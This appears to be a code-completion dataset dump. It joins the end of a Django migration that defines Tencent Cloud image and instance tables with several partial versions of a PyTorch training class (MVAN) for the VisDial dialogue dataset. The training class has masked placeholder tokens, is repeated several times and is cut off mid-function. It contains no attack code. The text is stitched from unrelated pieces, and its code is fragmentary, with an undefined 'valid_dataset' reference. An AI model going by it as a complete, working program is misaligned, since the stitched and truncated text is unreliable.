(\n 'instance_charge_type', models.CharField(max_length=50,\n verbose_name='实例计费模式')), ('private_ip_addresses', models.CharField(\n max_length=50, 
verbose_name='内网ip')), ('public_ip_addresses',\n models.CharField(max_length=50, verbose_name='外网ip')), ('image_id',\n models.CharField(max_length=50, verbose_name='镜像id')), ('os_name',\n models.CharField(max_length=50, verbose_name='操作系统名称')), (\n 'system_disk_type', models.CharField(max_length=50, verbose_name=\n '系统盘类型')), ('system_disk_size', models.CharField(max_length=50,\n verbose_name='系统盘尺寸')), ('renew_flag', models.CharField(max_length=\n 50, verbose_name='自动续费标识')), ('internet_max_bandwidth_out', models.\n CharField(max_length=50, verbose_name='实例网络带宽上限')), (\n 'internet_charge_type', models.CharField(max_length=50,\n verbose_name='实例网络计费类型')), ('created_time', models.DateTimeField(\n default=django.utils.timezone.now, verbose_name='实例创建时间')), (\n 'expired_time', models.DateTimeField(default=django.utils.timezone.\n now, verbose_name='实例到期时间'))], options={'db_table':\n 'qcloud_instance_info'})]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n dependencies = [('home_application', '0019_auto_20170809_1810')]\n operations = [migrations.CreateModel(name='QcloudImageInfo', fields=[(\n 'id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('image_id', models.\n CharField(max_length=50, verbose_name='镜像id')), ('osname', models.\n CharField(max_length=50, verbose_name='操作系统名称')), ('image_size',\n models.CharField(max_length=50, verbose_name='操作系统容量(GiB)')), (\n 'image_type', models.IntegerField(verbose_name='镜像类型')), (\n 'created_time', models.CharField(max_length=50, verbose_name=\n '镜像创建时间')), ('image_state', models.CharField(max_length=50,\n verbose_name='镜像状态')), ('image_source', models.CharField(max_length\n =50, verbose_name='镜像来源')), ('image_name', models.CharField(\n max_length=50, verbose_name='镜像名称')), ('image_description', models.\n CharField(max_length=50, verbose_name='镜像详细描述')), ('image_creator',\n models.CharField(max_length=50, verbose_name='镜像创建者')), (\n 'operation_mask', models.CharField(max_length=50, verbose_name=''))\n ], options={'db_table': 'qcloud_image_info'}), migrations.\n CreateModel(name='QcloudInstanceInfo', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('instance_id', models.CharField(max_length=50,\n verbose_name='实例id')), ('instance_name', models.CharField(\n max_length=50, verbose_name='实例名称')), ('instance_type', models.\n CharField(max_length=50, verbose_name='实例类型')), ('cpu', models.\n CharField(max_length=50, verbose_name='cpu')), ('memory', models.\n CharField(max_length=50, verbose_name='内存')), ('status', models.\n CharField(max_length=50, verbose_name='实例状态')), ('zone', models.\n CharField(max_length=50, verbose_name='实例所属地域')), (\n 'instance_charge_type', models.CharField(max_length=50,\n 
verbose_name='实例计费模式')), ('private_ip_addresses', models.CharField(\n max_length=50, verbose_name='内网ip')), ('public_ip_addresses',\n models.CharField(max_length=50, verbose_name='外网ip')), ('image_id',\n models.CharField(max_length=50, verbose_name='镜像id')), ('os_name',\n models.CharField(max_length=50, verbose_name='操作系统名称')), (\n 'system_disk_type', models.CharField(max_length=50, verbose_name=\n '系统盘类型')), ('system_disk_size', models.CharField(max_length=50,\n verbose_name='系统盘尺寸')), ('renew_flag', models.CharField(max_length=\n 50, verbose_name='自动续费标识')), ('internet_max_bandwidth_out', models.\n CharField(max_length=50, verbose_name='实例网络带宽上限')), (\n 'internet_charge_type', models.CharField(max_length=50,\n verbose_name='实例网络计费类型')), ('created_time', models.DateTimeField(\n default=django.utils.timezone.now, verbose_name='实例创建时间')), (\n 'expired_time', models.DateTimeField(default=django.utils.timezone.\n now, verbose_name='实例到期时间'))], options={'db_table':\n 'qcloud_instance_info'})]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home_application', '0019_auto_20170809_1810'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='QcloudImageInfo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image_id', models.CharField(max_length=50, verbose_name='\\u955c\\u50cfid')),\n ('osname', models.CharField(max_length=50, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf\\u540d\\u79f0')),\n ('image_size', models.CharField(max_length=50, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf\\u5bb9\\u91cf\\uff08GiB\\uff09')),\n ('image_type', models.IntegerField(verbose_name='\\u955c\\u50cf\\u7c7b\\u578b')),\n ('created_time', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u521b\\u5efa\\u65f6\\u95f4')),\n ('image_state', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u72b6\\u6001')),\n ('image_source', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u6765\\u6e90')),\n ('image_name', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u540d\\u79f0')),\n ('image_description', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u8be6\\u7ec6\\u63cf\\u8ff0')),\n ('image_creator', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u521b\\u5efa\\u8005')),\n ('operation_mask', models.CharField(max_length=50, verbose_name='')),\n ],\n options={\n 'db_table': 'qcloud_image_info',\n },\n ),\n migrations.CreateModel(\n name='QcloudInstanceInfo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('instance_id', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8bid')),\n ('instance_name', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u540d\\u79f0')),\n ('instance_type', 
models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u7c7b\\u578b')),\n ('cpu', models.CharField(max_length=50, verbose_name='cpu')),\n ('memory', models.CharField(max_length=50, verbose_name='\\u5185\\u5b58')),\n ('status', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u72b6\\u6001')),\n ('zone', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u6240\\u5c5e\\u5730\\u57df')),\n ('instance_charge_type', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u8ba1\\u8d39\\u6a21\\u5f0f')),\n ('private_ip_addresses', models.CharField(max_length=50, verbose_name='\\u5185\\u7f51ip')),\n ('public_ip_addresses', models.CharField(max_length=50, verbose_name='\\u5916\\u7f51ip')),\n ('image_id', models.CharField(max_length=50, verbose_name='\\u955c\\u50cfid')),\n ('os_name', models.CharField(max_length=50, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf\\u540d\\u79f0')),\n ('system_disk_type', models.CharField(max_length=50, verbose_name='\\u7cfb\\u7edf\\u76d8\\u7c7b\\u578b')),\n ('system_disk_size', models.CharField(max_length=50, verbose_name='\\u7cfb\\u7edf\\u76d8\\u5c3a\\u5bf8')),\n ('renew_flag', models.CharField(max_length=50, verbose_name='\\u81ea\\u52a8\\u7eed\\u8d39\\u6807\\u8bc6')),\n ('internet_max_bandwidth_out', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u7f51\\u7edc\\u5e26\\u5bbd\\u4e0a\\u9650')),\n ('internet_charge_type', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u7f51\\u7edc\\u8ba1\\u8d39\\u7c7b\\u578b')),\n ('created_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\\u5b9e\\u4f8b\\u521b\\u5efa\\u65f6\\u95f4')),\n ('expired_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\\u5b9e\\u4f8b\\u5230\\u671f\\u65f6\\u95f4')),\n ],\n options={\n 'db_table': 'qcloud_instance_info',\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MVAN(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.
hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(self.model, self.
optimizer, self.save_dirpath, hparams=self.hparams)
if self.hparams.load_pthpath == '':
self.start_epoch = 1
else:
self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]
[:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.
hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print('Loaded model from {}'.format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[
'ans_out']
batch_loss = self.criterion(output.view(-1, output.size(-1)),
target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
evaluation = Evaluation(self.hparams, model=self.model, split='val')
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0
train_begin = datetime.utcnow()
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
combined_dataloader = itertools.chain(self.train_dataloader)
print(f'\nTraining for epoch {epoch}:', 'Total Iter:', self.
iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch['img_ids'].shape[0]
if (self.hparams.virtual_batch_size == accumulate_batch or
i == len(self.train_dataset) // self.hparams.
train_batch_size):
self.optimizer.step()
if running_loss > 0.0:
running_loss = (0.95 * running_loss + 0.05 *
batch_loss.item())
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.optimizer
.param_groups[0]['lr']))
tqdm_batch_iterator.set_description(description)
if (global_iteration_step % self.hparams.
tensorboard_step == 0):
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.
optimizer.param_groups[0]['lr']))
self._logger.info(description)
self.summary_writer.add_scalar('train/loss',
batch_loss, global_iteration_step)
self.summary_writer.add_scalar('train/lr', self.
optimizer.param_groups[0]['lr'],
global_iteration_step)
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager
.ckpt_dirpath, 'checkpoint_%d.pth' % epoch)
self._logger.info(self.previous_model_path)
if (epoch < self.hparams.num_epochs - 1 and self.hparams.
dataset_version == '0.9'):
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path,
global_iteration_step, self.summary_writer, os.path.join(
self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %
epoch))
torch.cuda.empty_cache()
return self.previous_model_path
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MVAN(object):
<|reserved_special_token_0|>
def _build_dataloader(self):
old_split = 'train' if self.hparams.dataset_version == '0.9' else None
self.train_dataset = VisDialDataset(self.hparams, overfit=self.
hparams.overfit, split='train', old_split=old_split)
collate_fn = None
if 'dan' in self.hparams.img_feature_type:
collate_fn = self.train_dataset.collate_fn
self.train_dataloader = DataLoader(self.train_dataset, batch_size=
self.hparams.train_batch_size, num_workers=self.hparams.
cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)
print(
"""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
"""
)
def _build_model(self):
print('\t* Building model...')
encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
print('Encoder: {}'.format(self.hparams.encoder))
print('Decoder: {}'.format(self.hparams.decoder))
if self.hparams.glove_npy != '':
encoder.word_embed.weight.data = torch.from_numpy(np.load(self.
hparams.glove_npy))
print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)
)
decoder.word_embed = encoder.word_embed
self.model = EncoderDecoderModel(encoder, decoder)
self.model = self.model.to(self.device)
if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
if 'disc' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss()
elif 'gen' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss(ignore_index=self.
train_dataset.vocabulary.PAD_INDEX)
if self.hparams.training_splits == 'trainval':
self.iterations = (len(self.train_dataset) + len(self.
valid_dataset)) // self.hparams.virtual_batch_size
else:
self.iterations = len(self.train_dataset
) // self.hparams.virtual_batch_size
def lr_lambda_fun(current_iteration: int) ->float:
"""Returns a learning rate multiplier.
Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
and then gets multiplied by `lr_gamma` every time a milestone is crossed.
"""
current_epoch = float(current_iteration) / self.iterations
if current_epoch <= self.hparams.warmup_epochs:
alpha = current_epoch / float(self.hparams.warmup_epochs)
return self.hparams.warmup_factor * (1.0 - alpha) + alpha
else:
return_val = 1.0
if current_epoch >= self.hparams.lr_milestones[0
] and current_epoch < self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones, current_epoch)
return_val = pow(self.hparams.lr_gamma, idx)
elif current_epoch >= self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones2, current_epoch)
return_val = self.hparams.lr_gamma * pow(self.hparams.
lr_gamma2, idx)
return return_val
if self.hparams.lr_scheduler == 'LambdaLR':
self.optimizer = optim.Adam(self.model.parameters(), lr=self.
hparams.initial_lr)
self.scheduler = lr_scheduler.LambdaLR(self.optimizer,
lr_lambda=lr_lambda_fun)
else:
raise NotImplementedError
print(
"""
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
)
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.
hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(self.model, self.
optimizer, self.save_dirpath, hparams=self.hparams)
if self.hparams.load_pthpath == '':
self.start_epoch = 1
else:
self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]
[:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.
hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print('Loaded model from {}'.format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[
'ans_out']
batch_loss = self.criterion(output.view(-1, output.size(-1)),
target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
evaluation = Evaluation(self.hparams, model=self.model, split='val')
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0
train_begin = datetime.utcnow()
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
combined_dataloader = itertools.chain(self.train_dataloader)
print(f'\nTraining for epoch {epoch}:', 'Total Iter:', self.
iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch['img_ids'].shape[0]
if (self.hparams.virtual_batch_size == accumulate_batch or
i == len(self.train_dataset) // self.hparams.
train_batch_size):
self.optimizer.step()
if running_loss > 0.0:
running_loss = (0.95 * running_loss + 0.05 *
batch_loss.item())
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.optimizer
.param_groups[0]['lr']))
tqdm_batch_iterator.set_description(description)
if (global_iteration_step % self.hparams.
tensorboard_step == 0):
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.
optimizer.param_groups[0]['lr']))
self._logger.info(description)
self.summary_writer.add_scalar('train/loss',
batch_loss, global_iteration_step)
self.summary_writer.add_scalar('train/lr', self.
optimizer.param_groups[0]['lr'],
global_iteration_step)
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager
.ckpt_dirpath, 'checkpoint_%d.pth' % epoch)
self._logger.info(self.previous_model_path)
if (epoch < self.hparams.num_epochs - 1 and self.hparams.
dataset_version == '0.9'):
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path,
global_iteration_step, self.summary_writer, os.path.join(
self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %
epoch))
torch.cuda.empty_cache()
return self.previous_model_path
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MVAN(object):
def __init__(self, hparams):
self.hparams = hparams
self._logger = logging.getLogger(__name__)
np.random.seed(hparams.random_seed[0])
torch.manual_seed(hparams.random_seed[0])
torch.cuda.manual_seed_all(hparams.random_seed[0])
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
self.device = torch.device('cuda', self.hparams.gpu_ids[0]
) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')
setproctitle(hparams.dataset_version + '_' + hparams.model_name +
'_' + str(hparams.random_seed[0]))
def _build_dataloader(self):
old_split = 'train' if self.hparams.dataset_version == '0.9' else None
self.train_dataset = VisDialDataset(self.hparams, overfit=self.
hparams.overfit, split='train', old_split=old_split)
collate_fn = None
if 'dan' in self.hparams.img_feature_type:
collate_fn = self.train_dataset.collate_fn
self.train_dataloader = DataLoader(self.train_dataset, batch_size=
self.hparams.train_batch_size, num_workers=self.hparams.
cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)
print(
"""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
"""
)
def _build_model(self):
print('\t* Building model...')
encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
print('Encoder: {}'.format(self.hparams.encoder))
print('Decoder: {}'.format(self.hparams.decoder))
if self.hparams.glove_npy != '':
encoder.word_embed.weight.data = torch.from_numpy(np.load(self.
hparams.glove_npy))
print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)
)
decoder.word_embed = encoder.word_embed
self.model = EncoderDecoderModel(encoder, decoder)
self.model = self.model.to(self.device)
if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
if 'disc' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss()
elif 'gen' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss(ignore_index=self.
train_dataset.vocabulary.PAD_INDEX)
if self.hparams.training_splits == 'trainval':
self.iterations = (len(self.train_dataset) + len(self.
valid_dataset)) // self.hparams.virtual_batch_size
else:
self.iterations = len(self.train_dataset
) // self.hparams.virtual_batch_size
def lr_lambda_fun(current_iteration: int) ->float:
"""Returns a learning rate multiplier.
Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
and then gets multiplied by `lr_gamma` every time a milestone is crossed.
"""
current_epoch = float(current_iteration) / self.iterations
if current_epoch <= self.hparams.warmup_epochs:
alpha = current_epoch / float(self.hparams.warmup_epochs)
return self.hparams.warmup_factor * (1.0 - alpha) + alpha
else:
return_val = 1.0
if current_epoch >= self.hparams.lr_milestones[0
] and current_epoch < self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones, current_epoch)
return_val = pow(self.hparams.lr_gamma, idx)
elif current_epoch >= self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones2, current_epoch)
return_val = self.hparams.lr_gamma * pow(self.hparams.
lr_gamma2, idx)
return return_val
if self.hparams.lr_scheduler == 'LambdaLR':
self.optimizer = optim.Adam(self.model.parameters(), lr=self.
hparams.initial_lr)
self.scheduler = lr_scheduler.LambdaLR(self.optimizer,
lr_lambda=lr_lambda_fun)
else:
raise NotImplementedError
print(
"""
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
)
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.
hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(self.model, self.
optimizer, self.save_dirpath, hparams=self.hparams)
if self.hparams.load_pthpath == '':
self.start_epoch = 1
else:
self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]
[:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.
hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print('Loaded model from {}'.format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[
'ans_out']
batch_loss = self.criterion(output.view(-1, output.size(-1)),
target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
evaluation = Evaluation(self.hparams, model=self.model, split='val')
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0
train_begin = datetime.utcnow()
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
combined_dataloader = itertools.chain(self.train_dataloader)
print(f'\nTraining for epoch {epoch}:', 'Total Iter:', self.
iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch['img_ids'].shape[0]
if (self.hparams.virtual_batch_size == accumulate_batch or
i == len(self.train_dataset) // self.hparams.
train_batch_size):
self.optimizer.step()
if running_loss > 0.0:
running_loss = (0.95 * running_loss + 0.05 *
batch_loss.item())
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.optimizer
.param_groups[0]['lr']))
tqdm_batch_iterator.set_description(description)
if (global_iteration_step % self.hparams.
tensorboard_step == 0):
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.
optimizer.param_groups[0]['lr']))
self._logger.info(description)
self.summary_writer.add_scalar('train/loss',
batch_loss, global_iteration_step)
self.summary_writer.add_scalar('train/lr', self.
optimizer.param_groups[0]['lr'],
global_iteration_step)
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager
.ckpt_dirpath, 'checkpoint_%d.pth' % epoch)
self._logger.info(self.previous_model_path)
if (epoch < self.hparams.num_epochs - 1 and self.hparams.
dataset_version == '0.9'):
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path,
global_iteration_step, self.summary_writer, os.path.join(
self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %
epoch))
torch.cuda.empty_cache()
return self.previous_model_path
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
<|reserved_special_token_0|>
class MVAN(object):
def __init__(self, hparams):
self.hparams = hparams
self._logger = logging.getLogger(__name__)
np.random.seed(hparams.random_seed[0])
torch.manual_seed(hparams.random_seed[0])
torch.cuda.manual_seed_all(hparams.random_seed[0])
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
self.device = torch.device('cuda', self.hparams.gpu_ids[0]
) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')
setproctitle(hparams.dataset_version + '_' + hparams.model_name +
'_' + str(hparams.random_seed[0]))
def _build_dataloader(self):
old_split = 'train' if self.hparams.dataset_version == '0.9' else None
self.train_dataset = VisDialDataset(self.hparams, overfit=self.
hparams.overfit, split='train', old_split=old_split)
collate_fn = None
if 'dan' in self.hparams.img_feature_type:
collate_fn = self.train_dataset.collate_fn
self.train_dataloader = DataLoader(self.train_dataset, batch_size=
self.hparams.train_batch_size, num_workers=self.hparams.
cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)
print(
"""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
"""
)
def _build_model(self):
print('\t* Building model...')
encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
print('Encoder: {}'.format(self.hparams.encoder))
print('Decoder: {}'.format(self.hparams.decoder))
if self.hparams.glove_npy != '':
encoder.word_embed.weight.data = torch.from_numpy(np.load(self.
hparams.glove_npy))
print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)
)
decoder.word_embed = encoder.word_embed
self.model = EncoderDecoderModel(encoder, decoder)
self.model = self.model.to(self.device)
if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
if 'disc' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss()
elif 'gen' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss(ignore_index=self.
train_dataset.vocabulary.PAD_INDEX)
if self.hparams.training_splits == 'trainval':
self.iterations = (len(self.train_dataset) + len(self.
valid_dataset)) // self.hparams.virtual_batch_size
else:
self.iterations = len(self.train_dataset
) // self.hparams.virtual_batch_size
def lr_lambda_fun(current_iteration: int) ->float:
"""Returns a learning rate multiplier.
Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
and then gets multiplied by `lr_gamma` every time a milestone is crossed.
"""
current_epoch = float(current_iteration) / self.iterations
if current_epoch <= self.hparams.warmup_epochs:
alpha = current_epoch / float(self.hparams.warmup_epochs)
return self.hparams.warmup_factor * (1.0 - alpha) + alpha
else:
return_val = 1.0
if current_epoch >= self.hparams.lr_milestones[0
] and current_epoch < self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones, current_epoch)
return_val = pow(self.hparams.lr_gamma, idx)
elif current_epoch >= self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones2, current_epoch)
return_val = self.hparams.lr_gamma * pow(self.hparams.
lr_gamma2, idx)
return return_val
if self.hparams.lr_scheduler == 'LambdaLR':
self.optimizer = optim.Adam(self.model.parameters(), lr=self.
hparams.initial_lr)
self.scheduler = lr_scheduler.LambdaLR(self.optimizer,
lr_lambda=lr_lambda_fun)
else:
raise NotImplementedError
print(
"""
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
)
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.
hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(self.model, self.
optimizer, self.save_dirpath, hparams=self.hparams)
if self.hparams.load_pthpath == '':
self.start_epoch = 1
else:
self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]
[:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.
hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print('Loaded model from {}'.format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[
'ans_out']
